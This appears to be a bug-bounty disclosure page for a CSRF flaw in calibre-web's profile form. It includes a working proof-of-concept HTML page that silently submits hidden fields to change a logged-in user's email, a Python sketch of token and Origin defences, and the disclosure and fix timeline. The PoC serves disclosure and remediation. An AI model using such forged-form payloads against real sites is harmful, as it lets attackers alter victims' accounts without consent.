Cross-Site Request Forgery (CSRF) in janeczku/calibre-web

Valid

Reported on

Jul 23rd 2021


✍️ Description

An attacker can make a user change their profile settings through a CSRF vulnerability, demonstrated by the PoC file below. The profile form carries no CSRF token.

🕵️‍♂️ Proof of Concept

For example, to change the email address of test1's profile from "test1@test.com" to "test1@test.comm", make the logged-in user open a link to the following page, poc.html:

<!-- PoC.html -->
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8083/me" method="POST">
      <input type="hidden" name="email" value="test1&#64;test&#46;comm" />
      <input type="hidden" name="kindle&#95;mail" value="" />
      <input type="hidden" name="locale" value="en" />
      <input type="hidden" name="default&#95;language" value="all" />
      <input type="hidden" name="show&#95;16" value="on" />
      <input type="hidden" name="show&#95;65536" value="on" />
      <input type="hidden" name="show&#95;128" value="on" />
      <input type="hidden" name="show&#95;256" value="on" />
      <input type="hidden" name="show&#95;32" value="on" />
      <input type="hidden" name="show&#95;8" value="on" />
      <input type="hidden" name="show&#95;4" value="on" />
      <input type="hidden" name="show&#95;64" value="on" />
      <input type="hidden" name="show&#95;4096" value="on" />
      <input type="hidden" name="show&#95;2" value="on" />
      <input type="hidden" name="show&#95;8192" value="on" />
      <input type="hidden" name="show&#95;16384" value="on" />
      <input type="hidden" name="show&#95;32768" value="on" />
      <input type="hidden" name="show&#95;131072" value="on" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability allows unwanted actions and changes to the profile of a user who does not notice the hidden intent of the page they opened.
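As an added example, not calibre-web's own code and not the fix referenced in the thread below: a stdlib-only Python sketch of the synchronizer-token and Origin checks that would reject the PoC's POST to /me while still accepting the real settings form. SITE_ORIGIN, the dict-based session/form/headers and the attacker origin are constructed stand-ins.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost:8083"  # constructed: the origin used in the PoC above

def issue_csrf_token(session):
    """Mint a per-session synchronizer token; the server keeps its copy in the session."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def origin_allowed(headers, site_origin=SITE_ORIGIN):
    """Defence in depth: Origin (or, failing that, Referer) must match our own origin."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if not referer:
            return False  # cannot tell where the state-changing POST came from: reject
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == site_origin

def csrf_ok(session, form, headers):
    """True only if the form echoes the session token and the request is same-origin."""
    expected, supplied = session.get("csrf_token"), form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode()) and origin_allowed(headers)

def handle_profile_update(session, form, headers):
    """Stand-in for the POST /me handler: change the email only after the check passes."""
    if not csrf_ok(session, form, headers):
        return 403, session["user"]["email"]
    session["user"]["email"] = form["email"]
    return 200, session["user"]["email"]

def forged_request():
    """The PoC form: no token, submitted from an attacker-controlled page."""
    session = {"user": {"email": "test1@test.com"}}
    issue_csrf_token(session)  # the victim is logged in, so a token exists server-side
    form = {"email": "test1@test.comm"}
    headers = {"Origin": "http://attacker.example"}  # constructed attacker origin
    return handle_profile_update(session, form, headers)

def legitimate_request():
    """The real settings page: token embedded in the form, same-origin POST."""
    session = {"user": {"email": "test1@test.com"}}
    token = issue_csrf_token(session)
    form = {"email": "new@test.com", "csrf_token": token}
    return handle_profile_update(session, form, {"Origin": SITE_ORIGIN})
```

Either check alone would already stop the PoC above (it sends no token and comes from a foreign origin); keeping both guards against a missing or stripped Origin header.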

We have contacted a member of the janeczku/calibre-web team and are waiting to hear back (a year ago)
Ozzie Isaacs
a year ago

@admin: I can't tag this issue as valid (lost the magic link email or whatever)

Jamie Slome
a year ago

Admin

Marking as valid as a maintainer has requested for it to be marked accordingly.

Jamie Slome validated this vulnerability a year ago
Ileana Barrionuevo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on 50919d 10 months ago
Ozzie Isaacs has been awarded the fix bounty
Jamie Slome
10 months ago

Admin

For the record, I have rewarded the fix bounty to the maintainer (OzzieIsaacs), where it was previously dropped.
